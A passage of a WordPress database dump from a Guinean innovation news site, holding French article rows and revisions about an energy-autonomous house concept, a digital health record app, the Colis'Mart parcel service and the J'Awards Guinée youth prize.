src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 15:01:40','2017-10-26 15:01:40','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(658,1,'2017-10-26 15:03:42','2017-10-26 15:03:42','<p><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" /></p><p>Moustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:</p><p>-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.</p><p>-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.</p><p><strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.</p><p><strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.</p><p><strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\'><img width=\"366\" height=\"206\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg 366w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-300x169.jpg 300w\" sizes=\"(max-width: 366px) 100vw, 366px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure>\n		<p>Je suis un bloc de texte. Cliquez sur le bouton modifier pour changer ce texte. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 15:03:42','2017-10-26 15:03:42','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(659,1,'2017-10-26 15:04:07','2017-10-26 15:04:07','<p><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" /></p><p>Moustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:</p><p> </p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\'><img width=\"366\" height=\"206\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg 366w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-300x169.jpg 300w\" sizes=\"(max-width: 366px) 100vw, 366px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\'><img width=\"768\" height=\"432\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg\" alt=\"\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg 960w\" sizes=\"(max-width: 768px) 100vw, 768px\" /></a>\n			</figure>\n		<p>-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.</p><p>-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.</p><p><strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.</p><p><strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.</p><p><strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.</p>','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 15:04:07','2017-10-26 15:04:07','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(660,1,'2017-10-26 15:04:42','2017-10-26 15:04:42','&nbsp;\r\n\r\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" sizes=\"(max-width: 366px) 100vw, 366px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg 366w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-300x169.jpg 300w\" alt=\"\" width=\"366\" height=\"206\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 15:04:42','2017-10-26 15:04:42','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(662,1,'2017-10-30 11:18:56','2017-10-30 11:18:56','Mayalanyi, qui veut dire « Ma santé » en soussou (dialecte de Guinée), est le carnet de santé digital du citoyen guinéen. Sur son smartphone ou sa tablette, le patient va pouvoir accéder rapidement à son profil médical en cas d’urgence, exploiter son historique de consultations pour permettre au médecin d’établir un diagnostic fiable et accéder à une banque d’informations sur les médecins. Pourquoi un carnet de santé digital?\r\n\r\n• Pour permettre au citoyen de garder l’historique des consultations sous la main, d’accéder facilement à ses informations médicales en cas d’urgence et d’avoir accès à de nombreux spécialistes à tout moment.\r\n\r\n• Pour permettre au médecin d’avoir une base de données des patients consultés, d’être répertorié dans un catalogue fiable, d’avoir accès à l’historique du patient afin de mieux traiter celui-ci et de diminuer le risque d’erreurs lors des consultations des patients.\r\n\r\n<img class=\"alignnone size-medium wp-image-665\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Fatou thithi Camara crée un carnet de santé digitale.','','publish','open','open','','fatou-thithi-camara-creee-un-carnet-de-sante-digitale','','','2017-11-06 10:05:03','2017-11-06 10:05:03','',0,'https://guineeinnove.nimbasolution.com/?p=662',0,'post','',0),(663,1,'2017-10-30 11:18:56','2017-10-30 11:18:56','Guinée, sur son smartphone ou sa tablette, le patient guinéen pourra désormais accéder à son profil me´dical en cas d’urgence, mais aussi exploiter son historique de consultations pour permettre au me´decin d’e´tablir un diagnostic fiable et acce´der a` une banque d’informations sur les me´decins. Fatou Camara, gagnante du concours “Prix de l’entrepreneur social 2017” en Guinée, estime que ce carnet digital donnera aux médecins un accès fiable vers “la base de données de leurs patients, et leur permettra d’exploiter les informations médicales de ceux-ci afin d’éviter les risques que l’on connaît','Fatou thithi Camara créée un carnet de santé digitale.','','inherit','closed','closed','','662-revision-v1','','','2017-10-30 11:18:56','2017-10-30 11:18:56','',662,'https://guineeinnove.nimbasolution.com/2017/10/30/662-revision-v1/',0,'revision','',0),(665,1,'2017-10-30 11:24:11','2017-10-30 11:24:11','','poes','','inherit','open','closed','','poes','','','2017-10-30 11:24:11','2017-10-30 11:24:11','',662,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes.jpg',0,'attachment','image/jpeg',0),(666,1,'2017-10-30 11:29:09','2017-10-30 11:29:09','','mayalagny','','inherit','open','closed','','mayalagny','','','2017-10-30 11:29:09','2017-10-30 11:29:09','',662,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/mayalagny.jpg',0,'attachment','image/jpeg',0),(667,1,'2017-10-30 11:29:33','2017-10-30 11:29:33','Mayalanyi, qui veut dire « Ma santé » en soussou (dialecte de Guinée), est le carnet de santé digital du citoyen guinéen. Sur son smartphone ou sa tablette, le patient va pouvoir accéder rapidement à son profil médical en cas d’urgence, exploiter son historique de consultations pour permettre au médecin d’établir un diagnostic fiable et accéder à une banque d’informations sur les médecins. Pourquoi un carnet de santé digital?\r\n\r\n• Pour permettre au citoyen de garder l’historique des consultations sous la main, d’accéder facilement à ses informations médicales en cas d’urgence et d’avoir accès à de nombreux spécialistes à tout moment.\r\n\r\n• Pour permettre au médecin d’avoir une base de données des patients consultés, d’être répertorié dans un catalogue fiable, d’avoir accès à l’historique du patient afin de mieux traiter celui-ci et de diminuer le risque d’erreurs lors des consultations des patients.\r\n\r\n<img class=\"alignnone size-medium wp-image-665\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Fatou thithi Camara créée un carnet de santé digitale.','','inherit','closed','closed','','662-revision-v1','','','2017-10-30 11:29:33','2017-10-30 11:29:33','',662,'https://guineeinnove.nimbasolution.com/2017/10/30/662-revision-v1/',0,'revision','',0),(670,1,'2017-10-30 12:15:14','2017-10-30 12:15:14','Après 7 éditions du \"Prix Orange de l\'Entrepreneur Social\", un projet Guinéen a été sélectionné pour la 1ère fois parmi les 10 finalistes internationaux. Il s\'agit du projet <a href=\"http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html\">Colis\'Mart</a> de SEKOU LAMINE COYAH BANGOURA.\r\n\r\nCOLI’SMART COMPAGNIE offre une technologie orange colis qui permet de transférer les colis à distance partout en guinée presqu’a la même vitesse que le transfert d’argent: un colis acheté à distance via orange money, est déposé dans un point de colis (soit kiosque orange money, boutiques orange, pharmacies, station essences etc..) pour être expédié à temps réel par le biais des partenaires de transport (motos, voiture, camion etc…) qui récupèrent les colis d’un point de colis à un autre en fonction de leurs itinéraires. Pour utiliser le service ORANGE COLIS, l’abonné orange se rend dans un point de colis muni de son colis, fait le dépôt et souscrit moyennant un paiement par USSD (tarif fixé en fonction de l’emplacement du destinateur et de la quantité à livrer). Un message de notification est automatique envoyé au destinateur comportant le numéro de l’expéditeur, le nom du colis, l’adresse du point de réception, et le délai de disponibilité du colis. Les points de colis, les transporteurs et La société orange sont des partenaires qui bénéficient chacun d’un frais de commission à chaque livraison de colis, Colis’mart obtient le reste du montant de transfère de colis. Le transfert de colis via orange money va être une innovation dans le domaine du numérique Guinéen, il va contribuer à la réduction du taux de chômage et de la pauvreté par la création de nouveaux emplois pour la population guinéenne (plus de 800 jeunes d’ici 2023). Mais aussi de réduire la mortalité par la disponibilité des médicaments et réduire la pollution atmosphérique dus au nombre de trafic sur les voies ainsi que les embouteillages.','SEKOU LAMINE COYAH BANGOURA 1er Guinéen à être parmi les 10 finalistes du  \"Prix Orange de l\'Entrepreneur Social\".','','publish','open','open','','sekou-lamine-coyah-bangoura','','','2017-11-01 12:04:09','2017-11-01 12:04:09','',0,'https://guineeinnove.nimbasolution.com/?p=670',0,'post','',0),(671,1,'2017-10-30 12:15:14','2017-10-30 12:15:14','Après 7 éditions du \"Prix Orange de l\'Entrepreneur Social\", un projet Guinéen a été sélectionné','SEKOU LAMINE COYAH BANGOURA','','inherit','closed','closed','','670-revision-v1','','','2017-10-30 12:15:14','2017-10-30 12:15:14','',670,'https://guineeinnove.nimbasolution.com/2017/10/30/670-revision-v1/',0,'revision','',0),(672,1,'2017-10-30 12:22:21','2017-10-30 12:22:21','Après 7 éditions du \"Prix Orange de l\'Entrepreneur Social\", un projet Guinéen a été sélectionné pour la fois parmi les 10 finalistes internationaux. Il s\'agit du projet <a href=\"http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html\">Colis\'Mart</a> de SEKOU LAMINE COYAH BANGOURA.\n\nCOLI’SMART COMPAGNIE offre une technologie orange colis qui permet de transférer les colis à distance partout en guinée presqu’a la même vitesse que le transfert d’argent: un colis acheté à distance via orange money, est déposé dans un point de colis (soit kiosque orange money, boutiques orange, pharmacies, station essences etc..) pour être expédié à temps réel par le biais des partenaires de transport (motos, voiture, camion etc…) qui récupèrent les colis d’un point de colis à un autre en fonction de leurs itinéraires. Pour utiliser le service ORANGE COLIS, l’abonné orange se rend dans un point de colis muni de son colis, fait le dépôt et souscrit moyennant un paiement par USSD (tarif fixé en fonction de l’emplacement du destinateur et de la quantité à livrer). Un message de notification est automatique envoyé au destinateur comportant le numéro de l’expéditeur, le nom du colis, l’adresse du point de réception, et le délai de disponibilité du colis. Les points de colis, les transporteurs et La société orange sont des partenaires qui bénéficient chacun d’un frais de commission à chaque livraison de colis, Colis’mart obtient le reste du montant de transfère de colis. Le transfert de colis via orange money va être une innovation dans le domaine du numérique Guinéen, il va contribuer à la réduction du taux de chômage et de la pauvreté par la création de nouveaux emplois pour la population guinéenne (plus de 800 jeunes d’ici 2023). Mais aussi de réduire la mortalité par la disponibilité des médicaments et réduire la pollution atmosphérique dus au nombre de trafic sur les voies ainsi que les embouteillages.','SEKOU LAMINE COYAH BANGOURA 1er Guinéen à être parmi les 10 finalistes du  \"Prix Orange de l\'Entrepreneur Social\".','','inherit','closed','closed','','670-autosave-v1','','','2017-10-30 12:22:21','2017-10-30 12:22:21','',670,'https://guineeinnove.nimbasolution.com/2017/10/30/670-autosave-v1/',0,'revision','',0),(673,1,'2017-10-30 12:22:00','2017-10-30 12:22:00','','sekou','','inherit','open','closed','','sekou','','','2017-10-30 12:22:00','2017-10-30 12:22:00','',670,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sekou.jpg',0,'attachment','image/jpeg',0),(674,1,'2017-10-30 12:22:15','2017-10-30 12:22:15','Après 7 éditions du \"Prix Orange de l\'Entrepreneur Social\", un projet Guinéen a été sélectionné pour la fois parmi les 10 finalistes internationaux. Il s\'agit du projet <a href=\"http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html\">Colis\'Mart</a> de SEKOU LAMINE COYAH BANGOURA.\r\n\r\nCOLI’SMART COMPAGNIE offre une technologie orange colis qui permet de transférer les colis à distance partout en guinée presqu’a la même vitesse que le transfert d’argent: un colis acheté à distance via orange money, est déposé dans un point de colis (soit kiosque orange money, boutiques orange, pharmacies, station essences etc..) pour être expédié à temps réel par le biais des partenaires de transport (motos, voiture, camion etc…) qui récupèrent les colis d’un point de colis à un autre en fonction de leurs itinéraires. Pour utiliser le service ORANGE COLIS, l’abonné orange se rend dans un point de colis muni de son colis, fait le dépôt et souscrit moyennant un paiement par USSD (tarif fixé en fonction de l’emplacement du destinateur et de la quantité à livrer). Un message de notification est automatique envoyé au destinateur comportant le numéro de l’expéditeur, le nom du colis, l’adresse du point de réception, et le délai de disponibilité du colis. Les points de colis, les transporteurs et La société orange sont des partenaires qui bénéficient chacun d’un frais de commission à chaque livraison de colis, Colis’mart obtient le reste du montant de transfère de colis. Le transfert de colis via orange money va être une innovation dans le domaine du numérique Guinéen, il va contribuer à la réduction du taux de chômage et de la pauvreté par la création de nouveaux emplois pour la population guinéenne (plus de 800 jeunes d’ici 2023). Mais aussi de réduire la mortalité par la disponibilité des médicaments et réduire la pollution atmosphérique dus au nombre de trafic sur les voies ainsi que les embouteillages.','SEKOU LAMINE COYAH BANGOURA 1er Guinéen à être parmi les 10 finalistes du  \"Prix Orange de l\'Entrepreneur Social\".','','inherit','closed','closed','','670-revision-v1','','','2017-10-30 12:22:15','2017-10-30 12:22:15','',670,'https://guineeinnove.nimbasolution.com/2017/10/30/670-revision-v1/',0,'revision','',0),(678,1,'2017-10-30 12:45:06','2017-10-30 12:45:06','Dans son intervention, le coordinateur de ladite structure, Moussa Daraba, a indiqué que l’objectif visé est de créer quelque chose de positif pour la jeunesse guinéenne qui représente plus de 60% de la population. «<em>C’est pourquoi nous avons décidé de créer les J’awards Guinée», </em>a-t-il dit. Concrètement, il s’agit de primer des jeunes qui ont excellé dans leurs domaines d’activité respectifs.\r\n\r\nSelon le responsable de la Commission chargée de la Pré-sélection,  Abdourahmane Baldé, une cinquantaine de jeunes seront retenus dans dix  catégories. Ensuite,  un comité de nomination mettra en avant les dix meilleurs qui vont se qualifier pour la finale.\r\n\r\n<em> «Nous avons voulu accorder une mention exceptionnelle aux premiers de la République des sciences mathématiques, sociales, et expérimentales de l’enseignement général et ceux des sciences expérimentales et sociales de l’enseignement franco arabe»,</em> a-t-il signalé\r\n\r\nPrésent à cette cérémonie, le ministre en charge de la Jeunesse a indiqué que c’est un honneur pour lui d’accompagner cette  jeune structure.\r\n\r\n<em>«C’est une fierté pour moi de voir des jeunes gens qui viennent s’exprimer de façon claire. Il faut que la jeunesse accepte de travailler.  Nous les félicitons pour cette initiative, nous les encourageons. Le gouvernement et le Président de la République soutiennent cette initiative», </em>a déclaré Moustapha Naité.\r\n\r\nLes organisateurs promettent de tout mettre en oeuvre avec leurs partenaires comme l’<em><a href=\"http://agsp.ovh/\">Association Guinéenne des Sciences Politiques (AGSP)</a></em>,  pour que cette première édition soit un succès.','J’Awards Guinée : la structure intelligentsia Guinée lance la 1ère édition','','publish','open','open','','jawards-guinee-la-structure-intelligentsia-guinee-lance-la-1ere-edition','','','2017-11-01 11:57:56','2017-11-01 11:57:56','',0,'https://guineeinnove.nimbasolution.com/?p=678',0,'post','',0),(679,1,'2017-10-30 12:44:53','2017-10-30 